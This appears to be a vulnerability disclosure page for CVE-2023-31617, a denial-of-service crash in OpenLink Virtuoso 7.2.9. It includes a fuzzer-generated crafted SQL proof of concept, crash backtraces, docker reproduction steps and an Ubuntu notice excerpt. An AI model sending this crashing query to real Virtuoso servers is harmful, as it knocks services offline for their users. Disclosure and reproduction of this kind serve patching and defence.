Headline
CVE-2023-31617: virtuoso 7.2.9 crashed at dk_set_delete · Issue #1127 · openlink/virtuoso-opensource
An issue in the dk_set_delete component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE b ( folders VARCHAR(80), folderid VARCHAR(80), parentid VARCHAR(80), rootid VARCHAR(80), c INTEGER, path VARCHAR(80), id VARCHAR(80), i VARCHAR(80), d VARCHAR(80), e VARCHAR(80), f VARCHAR(80) ); SELECT -(coalesce((select max(coalesce((select b.f from b where not exists(select 1 from b where (abs(+rootid+19+19)/abs(b.rootid))<b.rootid) or 19+f>=(select -max(19) from b)+b.f),b.e+b.f)* -b.e+19-f) from b where (( -b.id<19) or d>=id)),b.id))*id*((b.rootid))-17 FROM b WHERE NOT (b.e not between b.f*id and b.f+ -d);
backtrace:
#0 0xe05b99 (dk_set_delete+0x39) #1 0x7ff2b5 (sqlg_vec_qns+0x365) #2 0x7fcfc7 (cv_vec_slots+0x947) #3 0x7fc563 (sqlg_vec_after_test+0x1b3) #4 0x80148f (qn_vec_slots+0x61f) #5 0x7ff412 (sqlg_vec_qns+0x4c2) #6 0x81464c (sqlg_vector_subq+0xdc) #7 0x814d91 (sqlg_vector+0x61) #8 0x6baa15 (sql_compile_1+0x2355) #9 0x7c8cd0 (stmt_set_query+0x340) #10 0x7cabc2 (sf_sql_execute+0x922) #11 0x7cbf4e (sf_sql_execute_w+0x17e) #12 0x7d4c0d (sf_sql_execute_wrapper+0x3d) #13 0xe1f01c (future_wrapper+0x3fc) #14 0xe2691e (_thread_boot+0x11e) #15 0x7fc16f67c609 (start_thread+0xd9) #16 0x7fc16f44c133 (clone+0x43) #0 0xe10319 (gpf_notice+0x209) #1 0xde599f (dk_free_box+0x2df) #2 0x6b35cc (fun_ref_free+0x4c) #3 0x50498d (qr_free+0x2ad) #4 0x504a1c (qr_free+0x33c) #5 0x504a1c (qr_free+0x33c) #6 0x504a1c (qr_free+0x33c) #7 0x504a1c (qr_free+0x33c) #8 0x7c4def (cli_scrap_cached_statements+0x41f) #9 0x7c53f5 (client_connection_free+0x265) #10 0x7c6365 (srv_client_connection_died+0x205) #11 0x7c652d (srv_client_session_died+0x2d) #12 0xe14dff (session_is_dead+0x6f) #13 0xe1f3d0 (future_wrapper+0x7b0) #14 0xe2691e (_thread_boot+0x11e) #15 0x7fefc040b609 (start_thread+0xd9) #16 0x7fefc01db133 (clone+0x43)
ways to reproduce (write poc to the file ‘/tmp/test.sql’ first):
remove the old one
docker container rm virtdb_test -f
start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
wait the server starting
sleep 10
check whether the simple query works
echo “SELECT 1;” | docker exec -i virtdb_test isql 1111 dba
run the poc
docker exec -i virtdb_test isql 1111 dba < “/tmp/test.sql”
Related news
Ubuntu Security Notice 6832-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.